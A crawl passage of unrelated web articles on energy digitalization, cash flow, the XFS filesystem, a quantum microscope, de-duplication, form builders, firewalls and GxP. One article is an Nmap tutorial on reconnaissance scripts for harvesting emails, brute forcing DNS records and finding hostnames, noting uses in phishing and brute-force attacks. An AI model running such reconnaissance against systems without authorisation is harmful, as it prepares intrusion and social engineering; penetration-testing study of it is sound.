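        return f"ALERT: {residual:.1f} C above model prediction - schedule inspection"
    return f"OK (residual {residual:.1f} C)"

print(check_asset(ambient_c=15.0, load_pct=80.0, measured_c=58.0))
```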
Digital twins can be used to replicate the physical and operational characteristics of a power generation plant or another utility asset prior to construction and also to help improve operations and maintenance over the useful life of the physical installation. As of now, with costs decreasing and technologies growing at an exponential pace, digitalization presents opportunities for Energy 4.0 companies to establish new business models and sustainable strategies for producing and delivering energy. Digitalization can facilitate positive change, but only if policymakers undertake efforts to understand, channel, and harness digitalization’s impacts and minimize its risks.
While there is no simple roadmap to show how an increasingly digitalized energy world will look in the future, the IEA recommends ten no-regrets policy actions that governments can take to prepare. It is hoped it will foster further discussion among governments, companies, and other stakeholders.
- Build digital expertise within their staff
- Ensure appropriate access to timely, robust, and verifiable data
- Build flexibility into policies to accommodate new technologies and developments
- Experiment, including through “learning by doing” pilot projects
- Participate in broader inter-agency discussions on digitalization
- Focus on the broader, overall system benefits
- Monitor the energy impacts of digitalization on overall energy demand
- Incorporate digital resilience by design into research, development, and product manufacturing
- Provide a level playing field to allow a variety of companies to compete and serve consumers better
- Learn from others, including both positive case studies as well as more cautionary tales
The world has begun to shift towards renewable resources, a trend where digital can be of great service in monitoring and delivering optimal outcomes. A well-planned digital transformation in the renewable energy sector will provide numerous benefits:
- Digitalization tools and platforms help build renewable energy plants with automated processes, for informed decision making. In addition, the interconnections they propose are the basis for a more decentralized generation, thus avoiding isolated ‘energy islands.’
- These platforms reduce downtime by offering alerts based on predictive maintenance, anticipating asset maintenance. The modernization of production plants is necessary to make them more efficient.
- They allow a more accurate forecast of the weather and market conditions, which helps to maximize renewable production, by offering a deep analysis of all information received in real-time, to be able to make decisions and offer stability in demand.
- The use of artificial intelligence and machine learning to optimize the engineering and construction of new renewable sources and plants reduces time to market, bringing forward the benefits of CO2-free generation and increasing production.
- Digital tools will increase employee productivity and make maintenance much more efficient. Digital transformation in the renewables sector allows different work processes to be automated, such as the remote control of photovoltaic and wind farms.
The level of digitalization in the electrical industry is already very high; production processes incorporated it more than 10 years ago. Hydroelectric power plants and wind farms, for example, are automated and run entirely from control centers, with direct consequences for employment and efficiency. But digital transformation does not influence only production and maintenance processes; it also influences relationships with customers.
Traditional energy companies are facing pressure from every corner, from squeezed margins to new competition and price fluctuations. Digital transformation is a crucial ingredient in the energy transition, allowing the integration of more and more renewable energy throughout the electrical system, increasing network reliability, and helping to better manage energy demand. | <urn:uuid:09936de4-2171-4819-9d35-1cd63cd027c9> | CC-MAIN-2022-40 | https://www.ciocoverage.com/digital-transformation-in-energy-sector/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00719.warc.gz | en | 0.927571 | 1,309 | 2.9375 | 3 |
Finance and Accounting
Cash flow optimisation techniques
Cash flow is essential for every business to meet its short-term goals. However, during the pandemic, 65% of small businesses struggled or failed to pay their operational expenses. Without sufficient liquidity, businesses could be profitable on paper yet go bankrupt. This raises a few important questions:
- How to have a structured approach to manage cash flow?
- How much cash reserve should a company have at any given time?
- How to optimise cash flow to prepare for crises?
Cash flow analysis and its importance
Cash flow gives you a picture of how your business earns and spends the money. It is different from profit, which is merely the income minus the expenses. Cash flow analysis tells you about:
- Your biggest customers
- Your largest expenses
- The amount of liquid cash you have available to meet any short-term expenses
Cash flow analysis helps you meet financial obligations while investing enough for your business growth.
Seven elements of managing cash flow
Small business cash flow management is a structured approach, and traditional methods of accounting, invoicing, and billing don't make the cut. You need to optimise and closely monitor the following elements using more innovative methods.
By giving excess leeway to their clients, companies reduce profitability even though they may have lots of business. Optimise receivables by:
- Aligning sales with finance: Define payment terms for both the customers and the company and align them with the customers’ master data.
- Having an efficient billing process: Automate the billing process, which includes approvals, error correction, and timely bill dispatch. Ensure that someone is in charge of the process.
- Defining a payment collection strategy: Have a mechanism to know which payments are on schedule and which will soon be overdue (a minimal sketch follows this list), and have a formal reminder and escalation process.
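A minimal sketch of such a mechanism is below: it buckets invoices into overdue, due-soon, and on-schedule groups. The invoice data and the seven-day warning window are assumptions:

```python
from datetime import date, timedelta

invoices = [  # assumed sample data: (customer, due date, amount)
    ("Acme Ltd", date(2022, 9, 30), 12_500),
    ("Beta LLC", date(2022, 10, 20), 4_800),
    ("Gamma BV", date(2022, 11, 15), 9_300),
]

def bucket(invoices, today, warn_days=7):
    """Group invoices so collections can focus on overdue and soon-due payments."""
    soon = today + timedelta(days=warn_days)
    report = {"overdue": [], "due_soon": [], "on_schedule": []}
    for customer, due, amount in invoices:
        if due < today:
            report["overdue"].append((customer, amount))
        elif due <= soon:
            report["due_soon"].append((customer, amount))
        else:
            report["on_schedule"].append((customer, amount))
    return report

print(bucket(invoices, today=date(2022, 10, 14)))
```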
Payments depend on your supplier’s terms. Here is how you can optimise them.
- Negotiate the payment terms upfront: We often negotiate the prices but not the payment terms. It is best to discuss and mention them in the contract.
- Get visibility on procurement data: You need a system that matches all purchase orders with their respective invoices; a graphical view of the procurement data helps identify problems quickly.
- Optimise the timing of the payment: Pay on time but don’t rule out advance payments. If you have surplus cash, early payments can get you discounts in the future.
Companies that hold inventory have to invest not only in physical space but also in the stock itself. You can manage both efficiently if you do the following:
- Stock minimal inventory: Businesses do not want to overstock or understock their warehouse. With technology that predicts demand, you can manage the supply and ensure sufficient cash liquidity.
- Monitor the demand: Monitor how the demand changes every week or month or during festive seasons. If you have a bird’s eye view of this data, you can choose your suppliers wisely.
- Get a real-time view: The right systems give you a real-time view of the stock and its location across your warehouses.
Cash flow forecasting mechanism
Carry out a forecasting and review exercise every 12–18 months. The direct method uses a cash-based forecast (rather than accrual) for short-term planning. The indirect method uses the income statement and balance sheet (days sales outstanding, days payables outstanding, and inventory) for long-term planning.
Cash flow statement
It indicates a company’s financial health and comprises cash from operating activities, investing activities, financing activities, the net change in cash, and net cash.
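The arithmetic behind a cash flow statement is straightforward; here is a toy example with invented figures:

```python
operating = 180_000    # cash generated by core operations (assumed)
investing = -75_000    # e.g. equipment purchases (assumed)
financing = -25_000    # e.g. loan repayments (assumed)
opening_cash = 60_000

net_change = operating + investing + financing
closing_cash = opening_cash + net_change
print(f"Net change in cash: {net_change:,}")    # 80,000
print(f"Closing cash:       {closing_cash:,}")  # 140,000
```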
Outputs should provide key areas for action to maintain operating cash by investing it strategically.
During business as usual, you could review cash flows once a month. But during crises, you need to perform the exercise weekly. Compare the forecast with the actual statement to identify variance and improve accuracy.
For organisations on the digital transformation journey, agility is key in responding to a rapidly changing technology and business landscape. Now more than ever, it is crucial to deliver and exceed organisational expectations with a robust digital mindset backed by innovation. Enabling businesses to sense, learn, respond, and evolve like living organisms will be imperative for business excellence. A comprehensive yet modular suite of services is doing precisely that. Equipping organisations with intuitive decision-making automatically at scale, actionable insights based on real-time solutions, anytime/anywhere experience, and in-depth data visibility across functions leading to hyper-productivity, Live Enterprise is building connected organisations that are innovating collaboratively for the future.
How can Infosys BPM help?
The order-to-cash (O2C) solution uses technologies such as AI, ML, RPA, and AR to improve your financial cash flow efficiency. You get superior experience and reduce any frauds and customer defaults, with solutions such as:
- Quote and order processing
- Billing, invoicing, and collections
- Dispute management
- Revenue leakage analysis
- Cash flow analytics
View the complete O2C solutions by Infosys BPM. | <urn:uuid:fe54e28d-b984-4917-849a-1f7975e65855> | CC-MAIN-2022-40 | https://www.infosysbpm.com/blogs/finance-accounting/cash-flow-optimization-techniques.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00719.warc.gz | en | 0.923027 | 1,075 | 2.546875 | 3 |
In 1994, Silicon Graphics Inc., of Mountain View, Calif., (SGI) released a new journaled file system on IRIX, the company’s System V-based version of UNIX. This advanced file system, called XFS, replaced SGI’s old EFS (Extent File System) file system, which was designed similar to the Berkeley Fast File System. Coordinating with many other kernel developers, SGI is currently working to tightly integrate the XFS file system with the Linux operating system so that we can take advantage of the many benefits of XFS over the current ext2 file system. This article discusses XFS and its technical specifications.
Origin of XFS
SGI designed XFS with a few very important features in mind, and for very specific reasons. In 1990, SGI realized that it would need to create something to replace EFS; EFS could not handle the demands of new and forthcoming applications. The issues facing any file system at that time were demands for increased disk capacity and bandwidth, and parallelism with new applications such as film, video, and large databases. Because EFS couldn’t hope to handle these needs efficiently, SGI created XFS for the purpose of handling new applications by providing support in a few key areas. These areas included fast crash recovery, large file systems, and large directories and files.
In 1999, SGI began to turn an eye to Linux as a viable and attractive operating platform to support. Due to the nature of Linux, and because SGI knew it had something to offer that would provide Linux with the same file-system capabilities as those found in IRIX, SGI released Open XFS to the Linux community.
Overview of XFS features
XFS provides some basic and powerful features that meet the requirements for any large file system, file, or directory. Let’s take a look at some of these features:
XFS uses B+ trees extensively in place of the traditional linear file system structure. B+ trees use a highly efficient indexing method to index directory entries, manage file extents, locate free space, and keep track of the locations of file index information. As a result, reading file systems and retrieving information from them happens quickly–without using large amounts of system resources.
Currently, the XFS team is developing enhancements to the Linux page cache so XFS can be tightly integrated with the Linux kernel. This work is being done so XFS relies solely on the page cache to store both file data and file system metadata. This work can also be used to enhance other file systems to improve overall system performance, because it is being developed at a kernel level. These features will most likely be unavailable until Linux 2.5, except as a part of XFS itself.
XFS also allocates inodes dynamically, assigning disk blocks to them as needed. If an application uses a small number of very large files, very little disk space is consumed by inode data, and the remainder of the disk is free to store file data. If an application uses many small files, more inodes are created as needed, making more disk space available for directories and files. This process is handled dynamically, with no need for user intervention or configuration; you can create your initial file system without tuning it for the type of application that will use it. For example, you no longer need to create a file system with a smaller block size for efficient use by a mail server. XFS handles all of this internally with an advanced space management technique that utilizes contiguity, parallelism, and fast logging.
Many powerful support utilities come with XFS and enhance it remarkably. It includes the following:
- A very fast mkfs utility to make the file system
- Advanced dump and restore utilities for backups
- xfs_db for debugging
- xfs_check for checking the file system
- xfs_repair for file system repairs
- xfs_fsr for defragmenting XFS file systems
- xfs_bmap, which can be used to interpret the metadata layouts for the file system
- grow_fs, which will enlarge XFS file systems online
XFS also provides file system journaling. This means that XFS uses database recovery techniques to recover a consistent file system state after a system crash. Using journaling, XFS is able to accomplish this recovery in under a second, regardless of the file system size. Traditional linear file systems without journaling, however, must run the fsck command over the entire file system to check it after a system crash; this process is rapid on smaller file systems, but can take a lot of time (in some cases measured in hours) on larger file systems. XFS is able to accomplish this fast recovery by logging all file transactions with information on free lists, inodes, directories, and so on. After a crash, the logs are analyzed, and XFS can quickly determine which transactions must be done in order to synchronize the file system to the state it was in prior to the crash.
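The recovery idea is easiest to see in a toy write-ahead log: after a crash, transactions that were fully committed to the log are replayed and incomplete ones are discarded. This is a generic illustration of journaling, not XFS's actual on-disk log format:

```python
# Each log record: (transaction id, committed?, list of (block, new_value)).
log = [
    (1, True,  [("inode#42", "size=4096"), ("freelist", "-1 block")]),
    (2, True,  [("dir#7", "+entry report.txt")]),
    (3, False, [("inode#99", "size=8192")]),   # crash happened mid-transaction
]

def recover(log):
    """Rebuild a consistent state by replaying only committed transactions."""
    disk = {}
    for txn_id, committed, changes in log:
        if not committed:
            continue                  # incomplete transaction: ignore it
        for block, value in changes:  # replay committed changes in order
            disk[block] = value
    return disk

print(recover(log))   # state reflects transactions 1 and 2 only
```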
XFS Technical Specifications
The following list summarizes most of the features that XFS provides. Because the Linux implementation of XFS is still in the development stages, the features listed may or may not be applicable to the Open XFS for Linux specification. These features are available to XFS for IRIX, and they give a reasonable idea of what we can expect from a Linux implementation of XFS:
File system scalability is the ability of the file system to provide support for very large file systems, large files, large directories, and large numbers of files while still providing good I/O performance. The scalability of a file system depends somewhat on how it stores information on files.
To illustrate this point, let us compare XFS (a 64-bit file system) to any other 32-bit file system. Because XFS uses 64 bits to store inode numbers and addresses for each disk block, a single file can theoretically be as large as 9 million terabytes. A 32-bit file system, however, cannot usefully exceed file sizes of 4GB. I don’t honestly know anyone who needs a file to be 9 million TB (or even 4GB!), but by providing such a high level of scalability, XFS ensures that it will not become an obsolete or unusable file system for many years to come. For individuals in high-level science applications (for example, NASA), or those in the video or audio industries where file sizes can reach ridiculous sizes, XFS is necessary to make their work easier and plausible.
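Those two figures can be sanity-checked with a few lines of arithmetic, treating the limits as a 32-bit and a signed 64-bit maximum file offset (exact limits vary by implementation and block size):

```python
TB = 10**12  # decimal terabyte

max_32bit = 2**32            # bytes addressable with 32-bit offsets
max_64bit = 2**63            # bytes addressable with a signed 64-bit offset

print(max_32bit / 2**30)     # 4.0  -> the familiar 4GB ceiling
print(max_64bit / TB)        # ~9.2 million TB, the "9 million terabytes" above
```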
Large directories are also an issue with traditional linear file systems. Applications such as Sendmail or news servers often result in spool directories with thousands of files. Looking up a filename in such a directory can take a long time, because typically the directory must be read from the beginning until the desired file is found. Because XFS uses a B+ tree structure, it makes directory searching extremely fast. Filenames in the directory are converted to a four-byte hash value and are used to index the B+ tree. Using this method, all directory functions (searching, creating, and removing) are very efficient and fast.
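The effect of hashing directory entries can be sketched with an ordinary dictionary standing in for the B+ tree. The 32-bit CRC below is just a convenient 4-byte hash for illustration, not the hash function XFS actually uses:

```python
import zlib

def name_hash(name: str) -> int:
    """Map a filename to a 4-byte value (stand-in for XFS's directory hash)."""
    return zlib.crc32(name.encode())

directory = {}   # hash -> list of (filename, inode), standing in for a B+ tree

def add_entry(name, inode):
    directory.setdefault(name_hash(name), []).append((name, inode))

def lookup(name):
    for entry_name, inode in directory.get(name_hash(name), []):
        if entry_name == name:     # handle hash collisions explicitly
            return inode
    return None

add_entry("mail-000123.eml", 8812)
print(lookup("mail-000123.eml"))   # 8812, found without scanning every entry
```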
Using the same idea, XFS supports large numbers of files efficiently because inodes are allocated dynamically and multiple file operations are performed in parallel. The only limitation for XFS in regards to the number of files in a file system is the space available to hold them. Because XFS dynamically allocates inodes, free space usage is extremely efficient, regardless of the file size. With traditional file systems–in which the number of inodes is specified during file system creation–you are limited by that initial number of inodes. You can increase or decrease the inode size and number during the file-system creation, but then you end up locking the system into a specific state of usability. If you use a large number of inodes up front, you consume a lot of disk space that may never be used. But if you use a smaller number of inodes, any small files stored on the file system will use the full inode block size and waste space that could have been saved by using a smaller inode size (which results in more inodes).
Why choose XFS?
As we've seen, XFS is a flexible, powerful, and fast file system. Current file system development for Linux includes a number of forthcoming journaling file systems. Available right now is the ReiserFS journaling file system, and coming soon is ext3, a backward-compatible journaling file system based on ext2. IBM has also made an initial release of its enterprise JFS, another journaled file system originally written for AIX.
So, in light of these forthcoming alternatives, why should you be concerned with XFS? If ReiserFS is currently available and these others are coming out, why should you choose XFS over any of them?
The main factor is maturity. ReiserFS and ext3 are still in-development immature file systems. XFS is mature–it’s been running on IRIX machines since 1994. SGI developed it six years ago to be a robust, long-standing, viable alternative to linear file systems. In short, SGI knows how to make a good file system.
Yes, we may have to wait another few months before XFS is a realistic alternative to ReiserFS, which is currently available; but I think the wait will be worth it. I’ve illustrated the many benefits of XFS over traditional file systems. Because it has commercial backing and–perhaps more important–because commercial dollars are invested in the project, XFS for Linux will quickly attain the same level of reliability it has had on IRIX for years. To get more information on XFS or to contribute to the project, visit the project Web site at http://oss.sgi.com/projects/xfs/. | <urn:uuid:40476a3f-5c10-47db-b78a-b982e1f7dbb3> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/os/xfs-its-worth-the-wait/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00719.warc.gz | en | 0.940905 | 2,049 | 3.09375 | 3 |
Quantum Microscope Illuminates Living Samples Safely Versus Conventional Microscopes Using Damaging High-Intensity Light
(CosmosMagazine) University of Queensland researchers have built a quantum microscope based on the strange phenomenon Albert Einstein once called “spooky action at a distance”.
This new device takes advantage of quantum entanglement to illuminate living samples safely – unlike conventional microscopes, which use potentially damaging high-intensity light.
Warwick Bowen, a quantum physicist at the University of Queensland, says this is the first entanglement-based sensor that supersedes non-quantum technology.
“This is exciting – it’s the first proof of the paradigm-changing potential of entanglement for sensing,” says Bowen, who is lead author on the new paper published in Nature.
“The best light microscopes use bright lasers that are billions of times brighter than the sun,” Bowen explains. “Fragile biological systems like a human cell can only survive a short time in them.
“We’re hitting the limits of what you can do just by increasing the intensity of your light.”
Bowen and team’s new microscope may just kickstart the next revolution in microscopy, because they’ve evaded these limitations by introducing quantum entanglement. | <urn:uuid:15a82964-cda9-43e7-bf76-b39fd0d08cf4> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-microscope-illuminates-living-samples-safely-versus-conventional-microscopes-using-damaging-high-intensity-light/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00719.warc.gz | en | 0.861343 | 279 | 3.28125 | 3 |
Target de-duplication can be performed in two ways: as post-process de-duplication or as inline de-duplication.
De-duplication that occurs between the source and the destination (target) is what is termed inline de-duplication. Post-process de-duplication, on the other hand, de-duplicates data at scheduled times after it has been transmitted by the source but before it reaches the storage device. The data can be channelled through hardware or software, depending on the case, and both remain in sync with the storage disk. In either form of target de-duplication, incoming data is evaluated against the data already on the storage disk so that duplicates can be identified and removed.
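The duplicate-matching step at the target can be illustrated with fixed-size chunks and content hashes. The chunk size and data below are arbitrary, and production systems use far more sophisticated chunking and indexing:

```python
import hashlib

CHUNK = 4096    # assumed fixed chunk size (bytes)
store = {}      # hash -> chunk, simulating the storage disk

def write_with_dedupe(data: bytes):
    """Store only chunks whose content hash has not been seen before."""
    written = skipped = 0
    for i in range(0, len(data), CHUNK):
        chunk = data[i:i + CHUNK]
        digest = hashlib.sha256(chunk).hexdigest()
        if digest in store:
            skipped += 1          # duplicate: only a reference would be kept
        else:
            store[digest] = chunk
            written += 1
    return written, skipped

payload = b"A" * 8192 + b"B" * 4096 + b"A" * 4096   # last chunk repeats earlier data
print(write_with_dedupe(payload))                   # (2, 2)
```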
Enterprises that run proprietary software benefit enormously from post-process de-duplication, because the source software does not need to be modified or redesigned to meet the needs of the de-duplication hardware or software. There is no need to worry about compatibility issues, as the source system can simply push the data into transmission, and there is no need to install de-duplication hardware or software at every terminal node. Because the de-duplication hardware or software sits in a central location, data from all nodes is automatically channelled through the de-dupe device on the network.
Lastly, removing the de-duplication load from the client CPU frees processing power for more effective use of the enterprise computing system. This is where post-process de-duplication is better than source de-duplication. There is also no doubt that target de-dupe is quicker than source de-duplication: the data is pushed straight onto the network, and the de-dupe process operates at the storage end, where it can match data faster and remove duplicates with ease.
For all its advantages, post-process de-duplication is not without flaws. It is known to be bandwidth intensive, so if the amount of data in an enterprise is growing exponentially, target de-duplication will not be the best option. In addition, before scheduled post-process de-duplication starts, large arrays of storage disks are needed to hold the transmitted data, even though this involves additional expense. That additional cost is among the flaws associated with post-process de-duplication.
Even allowing for the need to redesign proprietary software to accommodate the demands of the de-duplication process, to install de-duplication hardware or software at every connecting node, and other such factors, source de-duplication can still prove more cost effective than technologies based on target de-duplication. If the cloud service provider partnering with the enterprise charges fees based on bandwidth usage, source de-duplication may be further attractive.
Therefore, companies must determine which kind of de-duplication process will work best for them. Some of the things enterprises need to consider before selecting a de-duplication process include the volume of data, the availability of bandwidth, the cost of bandwidth, and many other important factors. In fact, determining the best fit for an enterprise is not an easy exercise. | <urn:uuid:611a33ed-07d8-46c5-8d8b-a6923b716646> | CC-MAIN-2022-40 | https://blog.backup-technology.com/category/other/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00719.warc.gz | en | 0.928742 | 755 | 2.53125 | 3 |
We all know and love it and would like to have it available all over the world - Wireless LAN. A technology that is used in many places to provide free Internet access, enable networking for various components or to move freely in offices and at home. But how secure is the wireless network that connects so many devices?
This talk will explore this question and try to give a brief overview of the functionality of the encryption standards WPA2 and WPA3 and explain known attacks on these two standards. The talk will also demonstrate the use of the well-known Krackattack. | <urn:uuid:170b36be-4bfe-422c-893a-5efdde436546> | CC-MAIN-2022-40 | https://cfp.bsidesvienna.at/bsv19/speaker/MRDQQE/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00719.warc.gz | en | 0.95115 | 126 | 2.578125 | 3 |
Nmap is a tool that can perform various activities in a penetration test. The NSE (Nmap Scripting Engine) and the scripts written for it so far can transform Nmap into a multi-purpose tool. For example, we can use Nmap during the information gathering stage of a penetration test just by using the appropriate scripts. In this article we will examine those scripts and the information that we can extract.
One of our first steps can be to determine the origin of the IP address that our client has given us. Nmap includes in its database a couple of scripts for this purpose. If we want to run all of these scripts we can use the following command, as can be seen in the image below:
As we can see, the script called an external website (geobytes) in order to determine the coordinates and location of our target.
The whois command can be run directly from the console in Linux environments. However, there is also a specific Nmap script that performs the same job. This script will return information about the registrar and contact names.
Email accounts can also prove important in a penetration test, as they can be used as usernames, in social engineering engagements (e.g. phishing attacks), or in situations where we have to conduct brute force attacks against the company's mail server. There are two scripts available for this job:
The http-google-email script uses Google Web and Google Groups searches to find email addresses related to the target host, while the http-email-harvest script spiders the web server and extracts any email addresses that it discovers. The http-email-harvest script is in the official Nmap repository, and the http-google-email script can be downloaded from here.
Brute Force DNS Records
DNS records contain a lot of information about a particular domain and cannot be ignored. Of course, there are dedicated tools for brute forcing DNS records that can produce better results, but the dns-brute script can also perform this job in case we want to extract DNS information during our Nmap scans.
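If you want to drive these scripts from your own tooling rather than typing the commands by hand, a thin wrapper around the nmap binary is enough. The script names below follow the ones discussed in this article, but exact names and availability depend on your Nmap version, so verify them with nmap's script help before relying on them, and only run them against systems you are authorised to test:

```python
import subprocess

def run_nse(target, scripts, script_args=None):
    """Run the given NSE scripts against a target and return nmap's text output."""
    cmd = ["nmap", "-Pn", "--script", ",".join(scripts)]
    if script_args:
        cmd += ["--script-args", script_args]
    cmd.append(target)
    result = subprocess.run(cmd, capture_output=True, text=True, check=False)
    return result.stdout

# Example: gather DNS records and email addresses in one pass (authorised targets only).
print(run_nse("example.com", ["dns-brute", "http-email-harvest"]))
```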
Discovering Additional Hostnames
We can discover additional hostnames that are based on the same IP address with the Nmap script http-reverse-ip. This script can help us find other web applications that exist on the same web server. It is an external script that can be downloaded from here.
In this article we examined some Nmap scripts (internal and external) that can be used during the information gathering stage of a penetration test, before we start the actual scanning. The information that we have obtained proves that Nmap can perform almost any task with its scripts. If it cannot do something that you want, then it is time to write your own Lua scripts and contribute to the community. | <urn:uuid:adf5b3ce-e3a2-4fd2-b539-e5949ab4f020> | CC-MAIN-2022-40 | https://pentestlab.blog/tag/information-gathering/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00719.warc.gz | en | 0.918744 | 594 | 2.71875 | 3 |
Online form builders are among the best applications developed in this modern age. They help create contact forms, registration forms, or surveys, enabling you to gather the data you need without face-to-face interactions.
An essential element of form makers is form fields. This article will explain what they are and how they can benefit you as you build your own forms.
Form fields are the building blocks of online forms. They let you collect data from the people who fill out your form.
Most form makers include different field types to put your title and objectives and ask various questions.
Here are some HTML form elements that you will likely encounter when you create your questionnaires or survey forms:
This form field type is added automatically to every online form. However, you should note that some description boxes are hidden by default.
Leave them blank if you're not keen on putting any title or description. You have to make sure that the main form block is filled in.
You can ask for small pieces of information here, such as a name, an email address, or an age. Respondents get a single line of text in which to answer the query, and you can restrict the input to text, numbers, and so on to help guarantee that the answers are complete.
It employs validation techniques: number validation can enforce a range of values, while text validation can check whether respondents entered properly formatted email addresses or links.
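Behind the scenes, this kind of validation usually boils down to a regular expression or a range check. A rough sketch follows; the email pattern is deliberately simple, and real form builders use stricter rules:

```python
import re

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")   # simplified email pattern

def validate_email(value: str) -> bool:
    return bool(EMAIL_RE.match(value))

def validate_number(value: str, low: int, high: int) -> bool:
    try:
        return low <= int(value) <= high
    except ValueError:
        return False

print(validate_email("jane@example.com"))   # True
print(validate_number("42", 18, 99))        # True
print(validate_number("abc", 18, 99))       # False
```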
Like the short answer field, this form field type asks for a text value but with a longer character limit. The data validations available here include length and regular expression. You can use them to receive detailed feedback or more extended notes in their answers.
Multiple choice lets you list down the possible answers to your questions. You can allow respondents to jump to another section based on their responses. You may also shuffle answer options to avoid partiality.
This field enables you to put a series of choices, and users can select more than one. You may require users to tick off a certain number of options. Some form makers may offer section jumps while others don't.
Do you want all of the answers in a dropdown menu? You can use this form field type. It's similar to multiple-choice, but it's in a dropdown list box. It keeps your online form clean and compact, especially when there are many choices.
This form field type allows respondents to choose a number within a set limit. The linear scale may range from 0 to 10, and you can put labels for the options, from lowest to highest.
This field type will be helpful if you're creating a form to let users reserve a time slot or if you're asking for their birthdate. Your respondents can use a dropdown box to choose a specific date or time.
The date format for the US version is set as Month/Date/Year, while UK versions may show Date/Month/Year. You can change it if necessary.
Simple contact forms do not need a lot of form fields, but longer surveys may look overloaded if it contains more than ten questions per page. Dividing them into sections can help break them into tiny pieces, so your respondents won't get overwhelmed.
Each section that you add may include its title and description. You can drag and drop elements to rearrange them.
Your respondents can skip some questions if these are not relevant to their previous answers. For example, you want to ask the respondent how many tickets he wants to buy. Now, he won't need to answer this if he's not attending the event.
The respondent can proceed to the following query with the conditional logic function without answering specific questions.
You can add optional questions or add a section jump. Ensure that the people who shouldn't see the questions are given alternate questions in another section. You may also send them to the end of the online form if there's nothing else to ask.
If you're looking for a form field example with outstanding creation capabilities, you may try FormBot. We provide a custom builder with an intuitive interface and a template library filled with ready-to-use forms.
We can help automate your workflow and enable you to focus on what matters most: engaging with your clients | <urn:uuid:5f1165c8-b5bf-45a0-a91e-278a1aee91b9> | CC-MAIN-2022-40 | https://www.formbot.com/form-builder/form-fields.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00719.warc.gz | en | 0.910531 | 849 | 2.546875 | 3 |
If you’re here, then you might be wondering what a firewall is. A firewall is a security device, computer software or hardware, that can help protect your whole network by filtering traffic and blocking any outsiders from gaining access to the private data on your computer or network. Not only do firewalls block unwanted traffic, but it can also help you block malicious software from infecting your devices. Firewalls can provide different types of protection. The key is figuring out how much protection it is that you need. For a helpful guide on firewalls and what they do, read on!
What Do Firewalls Do?
Firewalls act like gatekeepers. They monitor attempts to gain access to your operating system and block off unwanted traffic or unknown sources. How exactly does it do this? Firewalls act as a barrier or filter between your computer and another network, like the internet. You can think of a firewall kind of like a traffic controller. It helps protect your network and information by managing the network traffic. This includes blocking off any unsolicited incoming network traffic and validating access by assessing the network traffic for anything suspicious, like malware and hackers. Your operating systems and security software typically come with a pre-installed firewall too. It is a good idea to make sure that those features are all turned on. Also, check and see if your security settings are configured to run updates automatically.
How Do Firewalls Work?
To begin, a firewalled system analyzes network traffic based mostly on rules. A firewall only welcomes those incoming connections that it has already been configured to accept. It does this by allowing or blocking certain data packets – units of communication that you send over digital networks – based on pre-established security rules. A firewall works like a guard at your computer's entry point. Only trusted sources, or IP addresses, are granted access. IP addresses are important since they identify a source or a computer, just as your postal address identifies where you live.
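Stripped to its essentials, rule evaluation looks like the sketch below: each incoming connection is compared against an ordered rule list, the first match wins, and anything unmatched falls through to a default deny. The networks and ports are example values only:

```python
import ipaddress

RULES = [  # (allowed source network, destination port, action) -- example values
    (ipaddress.ip_network("203.0.113.0/24"), 443, "allow"),
    (ipaddress.ip_network("10.0.0.0/8"),     22,  "allow"),
]

def evaluate(src_ip: str, dst_port: int) -> str:
    """Return the action for a connection attempt; unsolicited traffic is denied."""
    src = ipaddress.ip_address(src_ip)
    for network, port, action in RULES:
        if src in network and dst_port == port:
            return action
    return "deny"   # default deny

print(evaluate("203.0.113.7", 443))   # allow
print(evaluate("198.51.100.9", 443))  # deny
```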
Kinds of Firewalls
There are hardware and software firewalls available, and each format serves a different but essential purpose. A hardware firewall is a physical device, much like a broadband router, that sits between your network and the gateway. A software firewall is internal: a program on your computer that controls traffic through application port numbers. There are also some cloud-based firewalls, known as Firewall as a Service (FaaS). One benefit of these cloud-based firewalls is that they can grow with your organization and, much like hardware firewalls, do very well with perimeter security.
En-Net Services Can Help Today
Experience a superior method of getting the public sector technology solutions you need through forming a partnership with En-Net Services. Our seasoned team members are familiar with the distinct purchasing and procurement cycles of state and local governments, as well as Federal, K-12 education, and higher education entities. En-Net is a certified Maryland Small Business Reserve with contract vehicles and sub-contracting partnerships to meet all contracting requirements. | <urn:uuid:ece1ec5d-9421-46ca-9827-a2acd47f5423> | CC-MAIN-2022-40 | https://www.en-netservices.com/blog/a-guide-to-firewalls-why-you-might-need-one/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00119.warc.gz | en | 0.951908 | 629 | 3.640625 | 4 |
Understanding GxP Regulations for Healthcare
GxP is a collection of quality guidelines and regulations created to ensure that bio/pharmaceutical products are safe, meet their intended use, and adhere to quality processes during manufacturing, control, storage and distribution.
What is GxP?
GxP was established by the Food and Drug Administration (FDA) and encompasses different standards recognized as:
- G – stands for “Good”
- P – stands for “Practice”
- x – variable depending on the application. It can be M for “Manufacturing,” C for “Clinical,” L for “Laboratory,” S for “Storage,” D for “Distribution,” R for “Review,” etc.
GxP ensures that regulated organizations comply with specific and secure manufacturing and storage processes and procedures that determine effective research standards for nonclinical laboratory trials and safe human-subject clinical trials. GxP's guidelines focus on:¹
- Traceability: The ability to reconstruct the development history of a drug or medical device.
- Accountability: The ability to resolve who has contributed what to the development and when.
- Data Integrity (DI): The reliability of data generated by the system. DI could be determined by the following activities:
- Identifying the data generated by the system during critical processes (data flow diagram)
